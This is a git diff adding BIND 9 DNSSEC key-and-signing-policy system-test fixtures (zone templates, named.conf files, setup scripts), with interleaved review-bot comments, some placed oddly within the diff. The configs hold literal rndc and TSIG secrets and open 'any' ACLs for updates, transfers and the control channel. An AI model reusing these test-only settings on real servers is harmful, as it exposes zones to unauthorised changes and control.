+++ b/bin/tests/system/kasp/ns4/setup.sh
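Review bot: The comment `/* Inherit dnssec-policy 'test' */` above zone "inherit.override.signed" in view "override" does not match the configuration: that view sets `dnssec-policy "default";`, so the zone inherits the view-level value and the comment should read `/* Inherit dnssec-policy 'default' */`, as the same position in ns5/named.conf.in does. Separately, the key blocks carry literal secrets, the control channel is `allow { any; }` behind the short `rndc_key` secret, and view "example1" sets `allow-update { any; };`, with nothing in the file stating that these are fixtures. A header comment such as `// Test-only keys and ACLs for the kasp system test; never reuse outside the test harness.` would make that explicit. The same `rndc_key` and `controls` blocks repeat in ns5/named.conf.in and ns6/named.conf.in.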
@@ -0,0 +1,33 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+echo_i "ns4/setup.sh"
+
+#
+# Set up zones that potentially will be initially signed.
+#
+for zn in inherit.inherit override.inherit none.inherit \
+ inherit.override override.override none.override \
+ inherit.none override.none none.none
+do
+ zone="$zn.signed"
+ echo_i "setting up zone: $zone"
+ zonefile="${zone}.db"
+ cp template.db.in $zonefile
+done
+
+cp example1.db.in example1.db
+cp example2.db.in example2.db
diff --git a/bin/tests/system/kasp/ns4/template.db.in b/bin/tests/system/kasp/ns4/template.db.in
new file mode 100644
index 0000000..0f72e9c
--- /dev/null
+++ b/bin/tests/system/kasp/ns4/template.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns4
+ns4 A 10.53.0.4
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+
diff --git a/bin/tests/system/kasp/ns5/named.conf.in b/bin/tests/system/kasp/ns5/named.conf.in
new file mode 100644
index 0000000..dae2405
--- /dev/null
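Review bot: `-e` is set only on the `#!/bin/sh -e` line, so it is lost whenever the script is passed to a shell as an argument instead of being executed directly, and a failed `cp` would then go unnoticed; how the test harness invokes the script is not visible in this diff. Adding `set -e` near the top of the script keeps the fail-fast behaviour in both cases. The expansion in `cp template.db.in $zonefile` should also be quoted as `"$zonefile"`, which matches the shellcheck directive already present in the file. Both points apply to ns5/setup.sh as well.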
+++ b/bin/tests/system/kasp/ns5/named.conf.in 
@@ -0,0 +1,132 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+key "sha1" {
+ algorithm "hmac-sha1";
+ secret "FrSt77yPTFx6hTs4i2tKLB9LmE0=";
+};
+
+key "sha224" {
+ algorithm "hmac-sha224";
+ secret "hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA==";
+};
+
+key "sha256" {
+ algorithm "hmac-sha256";
+ secret "R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY=";
+};
+
+dnssec-policy "test" {
+ keys {
+ csk key-directory lifetime 0 algorithm 14;
+ };
+};
+
+options {
+ query-source address 10.53.0.5;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.5; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-policy "none";
+};
+
+view "inherit" {
+ match-clients { key "sha1"; };
+
+ /* Inherit dnssec-policy 'none' */
+ zone "inherit.inherit.unsigned" {
+ type primary;
+ file "inherit.inherit.unsigned.db";
+ };
+
+ /* Override dnssec-policy */
+ zone "override.inherit.unsigned" {
+ type primary;
+ file "override.inherit.unsigned.db";
+ inline-signing yes;
+ dnssec-policy "default";
+ };
+
+ /* Unset dnssec-policy */
+ zone "none.inherit.unsigned" {
+ type primary;
+ file "none.inherit.unsigned.db";
+ dnssec-policy "none";
+ };
+};
+
+view "override" {
+ match-clients { key "sha224"; };
+ dnssec-policy "default";
+
+ /* Inherit dnssec-policy 'default' */
+ zone "inherit.override.unsigned" {
+ type primary;
+ file "inherit.override.unsigned.db";
+ inline-signing yes;
+ };
+
+ /* Override dnssec-policy */
+ zone
"override.override.unsigned" {
+ type primary;
+ file "override.override.unsigned.db";
+ inline-signing yes;
+ dnssec-policy "test";
+ };
+
+ /* Unset dnssec-policy */
+ zone "none.override.unsigned" {
+ type primary;
+ file "none.override.unsigned.db";
+ dnssec-policy "none";
+ };
+};
+
+view "none" {
+ match-clients { key "sha256"; };
+ dnssec-policy "none";
+
+ /* Inherit dnssec-policy 'none' */
+ zone "inherit.none.unsigned" {
+ type primary;
+ file "inherit.none.unsigned.db";
+ };
+
+ /* Override dnssec-policy */
+ zone "override.none.unsigned" {
+ type primary;
+ file "override.none.unsigned.db";
+ inline-signing yes;
+ dnssec-policy "test";
+ };
+
+ /* Unset dnssec-policy */
+ zone "none.none.unsigned" {
+ type primary;
+ file "none.none.unsigned.db";
+ dnssec-policy "none";
+ };
+};
diff --git a/bin/tests/system/kasp/ns5/setup.sh b/bin/tests/system/kasp/ns5/setup.sh
new file mode 100644
index 0000000..e51af06
--- /dev/null
+++ b/bin/tests/system/kasp/ns5/setup.sh
@@ -0,0 +1,30 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+# shellcheck source=conf.sh
+. "$SYSTEMTESTTOP/conf.sh"
+
+echo_i "ns5/setup.sh"
+
+#
+# Set up zones that potentially will be initially signed.
+#
+for zn in inherit.inherit override.inherit none.inherit \
+ inherit.override override.override none.override \
+ inherit.none override.none none.none
+do
+ zone="$zn.unsigned"
+ echo_i "setting up zone: $zone"
+ zonefile="${zone}.db"
+ cp template.db.in $zonefile
+done
diff --git a/bin/tests/system/kasp/ns5/template.db.in b/bin/tests/system/kasp/ns5/template.db.in
new file mode 100644
index 0000000..6cb07a4
--- /dev/null
+++ b/bin/tests/system/kasp/ns5/template.db.in
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns5
+ns5 A 10.53.0.5
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
+
diff --git a/bin/tests/system/kasp/ns6/example.db.in b/bin/tests/system/kasp/ns6/example.db.in
new file mode 100644
index 0000000..d6b912c
--- /dev/null
+++ b/bin/tests/system/kasp/ns6/example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+
+ NS ns6
+ns6 A 10.53.0.6
+
+a A 10.0.0.1
+b A 10.0.0.2
+c A 10.0.0.3
diff --git a/bin/tests/system/kasp/ns6/example2.db.in b/bin/tests/system/kasp/ns6/example2.db.in
new file mode 100644
index 0000000..46aed9b
--- /dev/null
+++ b/bin/tests/system/kasp/ns6/example2.db.in
@@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns6 +ns6 A 10.53.0.6 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/kasp/ns6/example3.db.in b/bin/tests/system/kasp/ns6/example3.db.in new file mode 100644 index 0000000..ccbd96a --- /dev/null +++ b/bin/tests/system/kasp/ns6/example3.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 400 +@ IN SOA mname1. . ( + 3 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns6 +ns6 A 10.53.0.6 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/kasp/ns6/named.conf.in b/bin/tests/system/kasp/ns6/named.conf.in new file mode 100644 index 0000000..cb9bd27 --- /dev/null +++ b/bin/tests/system/kasp/ns6/named.conf.in 
@@ -0,0 +1,97 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +include "policies/kasp.conf"; +include "policies/csk1.conf"; + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; + key-directory "."; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* This zone switch from dynamic to inline-signing. */ +zone "dynamic2inline.kasp" { + type primary; + file "dynamic2inline.kasp.db"; + allow-update { any; }; + dnssec-policy "default"; +}; + +/* These zones are going insecure. */ +zone "step1.going-insecure.kasp" { + type master; + file "step1.going-insecure.kasp.db"; + inline-signing yes; + dnssec-policy "unsigning"; +}; + +zone "step1.going-insecure-dynamic.kasp" { + type master; + file "step1.going-insecure-dynamic.kasp.db"; + dnssec-policy "unsigning"; + allow-update { any; }; +}; + +zone "step1.going-straight-to-none.kasp" { + type master; + file "step1.going-straight-to-none.kasp.db"; + inline-signing yes; + dnssec-policy "default"; +}; + +/* These are alorithm rollover test zones. 
*/ +zone "step1.algorithm-roll.kasp" { + type primary; + file "step1.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "rsasha256"; +}; + +zone "step1.csk-algorithm-roll.kasp" { + type primary; + file "step1.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +dnssec-policy "modified" { + keys { + csk lifetime unlimited algorithm rsasha256 2048; + }; +}; + +zone example { + type primary; + file "example.db"; + inline-signing yes; + dnssec-policy modified; +}; diff --git a/bin/tests/system/kasp/ns6/named2.conf.in b/bin/tests/system/kasp/ns6/named2.conf.in new file mode 100644 index 0000000..5f4097e --- /dev/null +++ b/bin/tests/system/kasp/ns6/named2.conf.in 
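Review bot: The `options` and `controls` blocks open the server up (`allow-transfer { any; }`, `controls { inet 10.53.0.6 ... allow { any; } keys { rndc_key; }; }` with the literal secret `1234abcd8765`, and `allow-update { any; }` on `dynamic2inline.kasp` and `step1.going-insecure-dynamic.kasp`) without a comment saying these are test-harness settings. Fixture files tend to get copied as starting points, so I would add a comment above `options` such as `/* Test fixture: open ACLs and the fixed rndc secret are only acceptable on the 10.53.0.6 test address. */`. The same applies to ns6/named2.conf.in in the next hunk. Two smaller points in this file: the zones mix `type master` and `type primary`, and the comment `alorithm rollover` should read `algorithm rollover`.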
@@ -0,0 +1,185 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +include "policies/kasp.conf"; +include "policies/csk2.conf"; + +options { + query-source address 10.53.0.6; + notify-source 10.53.0.6; + transfer-source 10.53.0.6; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.6; }; + listen-on-v6 { none; }; + allow-transfer { any; }; + recursion no; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.6 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* This zone switch from dynamic to inline-signing. */ +zone "dynamic2inline.kasp" { + type primary; + file "dynamic2inline.kasp.db"; + allow-update { any; }; + inline-signing yes; + dnssec-policy "default"; +}; + +/* Zones for testing going insecure. 
*/ +zone "step1.going-insecure.kasp" { + type master; + file "step1.going-insecure.kasp.db"; + inline-signing yes; + dnssec-policy "insecure"; +}; + +zone "step2.going-insecure.kasp" { + type master; + file "step2.going-insecure.kasp.db"; + inline-signing yes; + dnssec-policy "insecure"; +}; + +zone "step1.going-insecure-dynamic.kasp" { + type master; + file "step1.going-insecure-dynamic.kasp.db"; + dnssec-policy "insecure"; + allow-update { any; }; +}; + +zone "step2.going-insecure-dynamic.kasp" { + type master; + file "step2.going-insecure-dynamic.kasp.db"; + dnssec-policy "insecure"; + allow-update { any; }; +}; + +zone "step1.going-straight-to-none.kasp" { + type master; + file "step1.going-straight-to-none.kasp.db"; + dnssec-policy "none"; +}; + +/* + * Zones for testing KSK/ZSK algorithm roll. + */ +zone "step1.algorithm-roll.kasp" { + type primary; + file "step1.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step2.algorithm-roll.kasp" { + type primary; + file "step2.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step3.algorithm-roll.kasp" { + type primary; + file "step3.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step4.algorithm-roll.kasp" { + type primary; + file "step4.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step5.algorithm-roll.kasp" { + type primary; + file "step5.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +zone "step6.algorithm-roll.kasp" { + type primary; + file "step6.algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "ecdsa256"; +}; + +/* + * Zones for testing CSK algorithm roll. 
+ */ +zone "step1.csk-algorithm-roll.kasp" { + type primary; + file "step1.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step2.csk-algorithm-roll.kasp" { + type primary; + file "step2.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step3.csk-algorithm-roll.kasp" { + type primary; + file "step3.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step4.csk-algorithm-roll.kasp" { + type primary; + file "step4.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step5.csk-algorithm-roll.kasp" { + type primary; + file "step5.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +zone "step6.csk-algorithm-roll.kasp" { + type primary; + file "step6.csk-algorithm-roll.kasp.db"; + inline-signing yes; + dnssec-policy "csk-algoroll"; +}; + +dnssec-policy "modified" { + keys { + csk lifetime unlimited algorithm rsasha256 2048; + }; +}; + +zone example { + type primary; + file "example.db"; + inline-signing yes; + dnssec-policy modified; +}; diff --git a/bin/tests/system/kasp/ns6/policies/csk1.conf.in b/bin/tests/system/kasp/ns6/policies/csk1.conf.in new file mode 100644 index 0000000..a5ff042 --- /dev/null +++ b/bin/tests/system/kasp/ns6/policies/csk1.conf.in 
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "csk-algoroll" {
+ signatures-refresh P5D;
+ signatures-validity 30d;
+ signatures-validity-dnskey 30d;
+
+ keys {
+ csk lifetime unlimited algorithm rsasha256;
+ };
+
+ dnskey-ttl 1h;
+ publish-safety PT1H;
+ retire-safety 2h;
+ zone-propagation-delay 3600;
+ max-zone-ttl 6h;
+ parent-propagation-delay pt1h;
+ parent-ds-ttl 7200;
+};
diff --git a/bin/tests/system/kasp/ns6/policies/csk2.conf.in b/bin/tests/system/kasp/ns6/policies/csk2.conf.in
new file mode 100644
index 0000000..6d290c3
--- /dev/null
+++ b/bin/tests/system/kasp/ns6/policies/csk2.conf.in
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "csk-algoroll" {
+ signatures-refresh P5D;
+ signatures-validity 30d;
+ signatures-validity-dnskey 30d;
+
+ keys {
+ csk lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ };
+
+ dnskey-ttl 1h;
+ publish-safety PT1H;
+ retire-safety 2h;
+ zone-propagation-delay 3600;
+ max-zone-ttl 6h;
+ parent-propagation-delay pt1h;
+ parent-ds-ttl 7200;
+};
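Review bot: csk1.conf.in and csk2.conf.in both define a policy named `csk-algoroll` and differ only in the `csk lifetime unlimited algorithm ...` line, yet neither file says which side of the rollover it represents. From the visible configs, named.conf.in includes `policies/csk1.conf` and named2.conf.in includes `policies/csk2.conf`, so a header comment such as `/* csk-algoroll before the algorithm change (loaded by named.conf). */`, and its counterpart in csk2, would make the pairing explicit. The `rsasha256` key in csk1 also omits a key length, while the `modified` policy in named.conf.in spells out `rsasha256 2048`; stating the size here would keep the fixture independent of the built-in default.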
diff --git a/bin/tests/system/kasp/ns6/policies/kasp-fips.conf.in b/bin/tests/system/kasp/ns6/policies/kasp-fips.conf.in
new file mode 100644
index 0000000..810b91d
--- /dev/null
+++ b/bin/tests/system/kasp/ns6/policies/kasp-fips.conf.in
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+dnssec-policy "unsigning" {
+ dnskey-ttl 7200;
+
+ keys {
+ ksk key-directory lifetime unlimited algorithm @DEFAULT_ALGORITHM@;
+ zsk key-directory lifetime P60D algorithm @DEFAULT_ALGORITHM@;
+ };
+};
+
+dnssec-policy "nsec3" {
+ nsec3param iterations 0 optout no salt-length 0;
+};
+
+dnssec-policy "rsasha256" {
+ signatures-refresh P5D;
+ signatures-validity 30d;
+ signatures-validity-dnskey 30d;
+
+ keys {
+ ksk lifetime unlimited algorithm rsasha256;
+ zsk lifetime unlimited algorithm rsasha256;
+ };
+
+ dnskey-ttl 1h;
+ publish-safety PT1H;
+ retire-safety 2h;
+ zone-propagation-delay 3600;
+ max-zone-ttl 6h;
+ parent-propagation-delay pt1h;
+ parent-ds-ttl 7200;
+};
+
+dnssec-policy "ecdsa256" {
+ signatures-refresh P5D;
+ signatures-validity 30d;
+ signatures-validity-dnskey 30d;
+
+ keys {
+ ksk lifetime unlimited algorithm ecdsa256;
+ zsk lifetime unlimited algorithm ecdsa256;
+ };
+
+ dnskey-ttl 1h;
+ publish-safety PT1H;
+ retire-safety 2h;
+ zone-propagation-delay 3600;
+ max-zone-ttl 6h;
+ parent-propagation-delay pt1h;
+ parent-ds-ttl 7200;
+};
diff --git a/bin/tests/system/kasp/ns6/policies/kasp.conf.in b/bin/tests/system/kasp/ns6/policies/kasp.conf.in
new file mode 100644
index 0000000..d634b76
--- /dev/null
+++ b/bin/tests/system/kasp/ns6/policies/kasp.conf.in
@@ -0,0 +1,33 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+include "policies/kasp-fips.conf";
+
+dnssec-policy "rsasha1" {
+ signatures-refresh P5D;
+ signatures-validity 30d;
+ signatures-validity-dnskey 30d;
+
+ keys {
+ ksk lifetime unlimited algorithm rsasha1;
+ zsk lifetime unlimited algorithm rsasha1;
+ };
+
+ dnskey-ttl 1h;
+ publish-safety PT1H;
+ retire-safety 2h;
+ zone-propagation-delay 3600;
+ max-zone-ttl 6h;
+ parent-propagation-delay pt1h;
+ parent-ds-ttl 7200;
+};
diff --git a/bin/tests/system/kasp/ns6/setup.sh b/bin/tests/system/kasp/ns6/setup.sh
new file mode 100644
index 0000000..3a18750
--- /dev/null
+++ b/bin/tests/system/kasp/ns6/setup.sh
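Review bot: The `rsasha1` policy defined here is not referenced by any zone in ns6/named.conf.in or ns6/named2.conf.in, which use `default`, `unsigning`, `insecure`, `none`, `rsasha256`, `ecdsa256`, `csk-algoroll` and `modified`. It is the only thing this file adds over `policies/kasp-fips.conf`, so a one-line comment should say why it is kept, for example `/* RSASHA1 is unavailable in FIPS builds; policies that need it live here, outside kasp-fips.conf. */`. That wording assumes the intent the file names suggest, which the hunk itself does not state. If nothing in the ns6 tests uses the policy, dropping it avoids carrying a SHA-1 signing configuration that is never exercised.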
@@ -0,0 +1,409 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +echo_i "ns6/setup.sh" + +setup() { + zone="$1" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + infile="${zone}.db.infile" +} + +# Make lines shorter by storing key states in environment variables. +H="HIDDEN" +R="RUMOURED" +O="OMNIPRESENT" +U="UNRETENTIVE" + +# The child zones (step1, step2) beneath these zones represent the various +# steps of unsigning a zone. +for zn in going-insecure.kasp going-insecure-dynamic.kasp +do + # Step 1: + # Set up a zone with dnssec-policy that is going insecure. + setup step1.$zn + echo "$zone" >> zones + T="now-10d" + ksktimes="-P $T -A $T -P sync $T" + zsktimes="-P $T -A $T" + KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) + ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2) + cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" + cp $infile $zonefile + $SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + + # Step 2: + # Set up a zone with dnssec-policy that is going insecure. Don't add + # this zone to the zones file, because this zone is no longer expected + # to be fully signed. + setup step2.$zn + # The DS was withdrawn from the parent zone 26 hours ago. 
+ Trem="now-26h" + ksktimes="-P $T -A $T -P sync $T" + zsktimes="-P $T -A $T" + KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) + ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2) + $SETTIME -s -g $H -k $O $T -r $O $T -d $U $Trem -D ds $Trem "$KSK" > settime.out.$zone.1 2>&1 + $SETTIME -s -g $H -k $O $T -z $O $T "$ZSK" > settime.out.$zone.2 2>&1 + # Fake lifetime of old algorithm keys. + echo "Lifetime: 0" >> "${KSK}.state" + echo "Lifetime: 5184000" >> "${ZSK}.state" + cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" + private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" + cp $infile $zonefile + $SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 +done + +# This zone is going straight to "none" policy. This is undefined behavior. +setup step1.going-straight-to-none.kasp +echo "$zone" >> zones +TactN="now" +csktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +CSK=$($KEYGEN -k default $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -z $O $TactN -r $O $TactN -d $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# The zones at algorithm-roll.kasp represent the various steps of a ZSK/KSK +# algorithm rollover. +# + +# Step 1: +# Introduce the first key. This will immediately be active. 
+setup step1.algorithm-roll.kasp +echo "$zone" >> zones +TactN="now" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK=$($KEYGEN -a RSASHA256 -L 3600 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a RSASHA256 -L 3600 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone 8 "$KSK" >> "$infile" +private_type_record $zone 8 "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 2: +# After the publication interval has passed the DNSKEY is OMNIPRESENT. +setup step2.algorithm-roll.kasp +# The time passed since the new algorithm keys have been introduced is 3 hours. +TactN="now-3h" +TpubN1="now-3h" +# Tsbm(N+1) = TpubN1 + Ipub = now + TTLsig + Dprp + publish-safety = +# now - 3h + 6h + 1h + 1h = now + 5h +TsbmN1="now+5h" +ksk1times="-P ${TactN} -A ${TactN} -P sync 